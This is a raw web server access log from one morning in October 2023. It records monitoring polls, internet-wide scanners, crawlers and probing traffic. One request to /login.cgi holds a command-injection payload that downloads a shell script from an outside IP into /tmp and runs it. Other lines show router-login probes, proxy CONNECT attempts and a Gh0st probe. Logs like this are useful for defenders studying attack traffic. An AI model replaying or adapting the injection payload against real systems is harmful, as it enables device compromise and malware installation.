193.106.29.122 - - [04/Oct/2023:06:49:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
45.88.90.10 - - [04/Oct/2023:06:50:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
64.62.197.66 - - [04/Oct/2023:06:51:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
195.32.27.17 - - [04/Oct/2023:06:51:27 +0200] "GET /login.cgi?cli=aa%20aa%27cd%20/tmp;wget%20http://194.180.48.100/l.sh;chmod%20777%20l.sh%20sh%20/tmp/%27$l.sh HTTP/1.1" 400 329 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
198.235.24.65 - - [04/Oct/2023:06:53:32 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
51.254.59.113 - - [04/Oct/2023:06:53:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
87.236.176.208 - - [04/Oct/2023:06:56:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
194.165.16.72 - - [04/Oct/2023:06:58:16 +0200] "\x03" 501 316 "-" "-"
45.88.90.10 - - [04/Oct/2023:06:59:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
138.122.20.73 - - [04/Oct/2023:06:59:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:07:00:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:01:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:02:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.240.205.34 - - [04/Oct/2023:07:02:57 +0200] "Gh0st\xad" 501 321 "-" "-"
212.91.246.72 - - [04/Oct/2023:07:03:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:04:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
38.110.46.2 - - [04/Oct/2023:07:04:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux i686; rv:110.0) Gecko/20100101 Firefox/110.0"
199.45.154.4 - - [04/Oct/2023:07:05:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux i686; rv:110.0) Gecko/20100101 Firefox/110.0"
199.45.155.4 - - [04/Oct/2023:07:05:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux i686; rv:110.0) Gecko/20100101 Firefox/110.0"
171.67.71.144 - - [04/Oct/2023:07:05:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux i686; rv:110.0) Gecko/20100101 Firefox/110.0"
212.91.246.72 - - [04/Oct/2023:07:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:06:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:07:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.218.206.66 - - [04/Oct/2023:07:08:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36"
184.105.139.70 - - [04/Oct/2023:07:08:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
184.105.247.194 - - [04/Oct/2023:07:08:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
212.91.246.72 - - [04/Oct/2023:07:08:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:09:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.71.191.167 - - [04/Oct/2023:07:09:58 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
216.218.206.66 - - [04/Oct/2023:07:10:38 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
212.91.246.72 - - [04/Oct/2023:07:10:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.194 - - [04/Oct/2023:07:10:56 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
184.105.139.70 - - [04/Oct/2023:07:10:58 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0"
216.218.206.66 - - [04/Oct/2023:07:11:39 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:07:11:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.194 - - [04/Oct/2023:07:11:45 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
184.105.139.70 - - [04/Oct/2023:07:11:48 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
212.91.246.72 - - [04/Oct/2023:07:12:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:13:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.243.152.5 - - [04/Oct/2023:07:13:59 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2023:07:14:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.243.152.5 - - [04/Oct/2023:07:14:57 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.152.5 - - [04/Oct/2023:07:14:58 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.152.5 - - [04/Oct/2023:07:15:16 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.152.5 - - [04/Oct/2023:07:15:23 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.152.5 - - [04/Oct/2023:07:15:28 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2023:07:15:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.243.152.5 - - [04/Oct/2023:07:15:44 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.152.5 - - [04/Oct/2023:07:15:53 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.152.5 - - [04/Oct/2023:07:15:59 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
162.243.152.5 - - [04/Oct/2023:07:16:08 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2023:07:16:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:17:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.167.144.67 - - [04/Oct/2023:07:18:27 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:07:18:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.71.191.167 - - [04/Oct/2023:07:19:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
167.71.191.167 - - [04/Oct/2023:07:19:33 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.83/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
212.91.246.72 - - [04/Oct/2023:07:19:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.10 - - [04/Oct/2023:07:19:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [04/Oct/2023:07:20:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:21:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:22:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:23:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.10 - - [04/Oct/2023:07:24:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [04/Oct/2023:07:24:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:25:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.10 - - [04/Oct/2023:07:26:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [04/Oct/2023:07:26:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.35.18.187 - - [04/Oct/2023:07:27:18 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Oct/2023:07:27:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.67.136.168 - - [04/Oct/2023:07:28:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
84.54.51.12 - - [04/Oct/2023:07:28:20 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Oct/2023:07:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.13 - - [04/Oct/2023:07:28:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.13 - - [04/Oct/2023:07:28:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.13 - - [04/Oct/2023:07:28:57 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.13 - - [04/Oct/2023:07:28:57 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Oct/2023:07:29:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [04/Oct/2023:07:30:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [04/Oct/2023:07:30:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:31:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:32:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:33:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.35.18.187 - - [04/Oct/2023:07:33:53 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Oct/2023:07:34:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.154.182.11 - - [04/Oct/2023:07:35:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2023:07:35:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.22.47.52 - - [04/Oct/2023:07:36:58 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
165.22.47.52 - - [04/Oct/2023:07:37:02 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
165.22.47.52 - - [04/Oct/2023:07:37:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2023:07:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:38:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:39:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:40:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:41:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:42:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:43:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:44:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.203.210.204 - - [04/Oct/2023:07:45:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
34.67.136.168 - - [04/Oct/2023:07:45:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
212.91.246.72 - - [04/Oct/2023:07:45:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.32.233.30 - - [04/Oct/2023:07:46:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
94.102.61.80 - - [04/Oct/2023:07:46:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.80 - - [04/Oct/2023:07:46:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:07:46:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.80 - - [04/Oct/2023:07:46:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.80 - - [04/Oct/2023:07:47:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
152.32.233.30 - - [04/Oct/2023:07:47:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2023:07:47:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.80 - - [04/Oct/2023:07:47:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.80 - - [04/Oct/2023:07:48:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:07:48:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.80 - - [04/Oct/2023:07:48:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
152.32.233.30 - - [04/Oct/2023:07:48:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
94.102.61.80 - - [04/Oct/2023:07:48:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.80 - - [04/Oct/2023:07:49:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:07:49:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.154.172.164 - - [04/Oct/2023:07:49:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
193.35.18.31 - - [04/Oct/2023:07:50:04 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
94.102.61.80 - - [04/Oct/2023:07:50:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:07:50:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.85 - - [04/Oct/2023:07:50:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
152.32.233.30 - - [04/Oct/2023:07:51:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
165.154.162.96 - - [04/Oct/2023:07:51:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2023:07:51:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:52:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:53:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:54:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:55:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:56:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:57:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:58:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:07:59:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:00:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:01:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:02:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [04/Oct/2023:08:03:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
193.106.29.122 - - [04/Oct/2023:08:03:39 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [04/Oct/2023:08:03:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:04:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:06:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:07:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:08:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.154.172.164 - - [04/Oct/2023:08:09:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2023:08:09:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.10 - - [04/Oct/2023:08:09:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [04/Oct/2023:08:10:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:11:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:12:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.154.172.164 - - [04/Oct/2023:08:12:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2023:08:13:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:14:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:15:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:16:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:17:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:18:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:19:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:20:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [04/Oct/2023:08:21:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
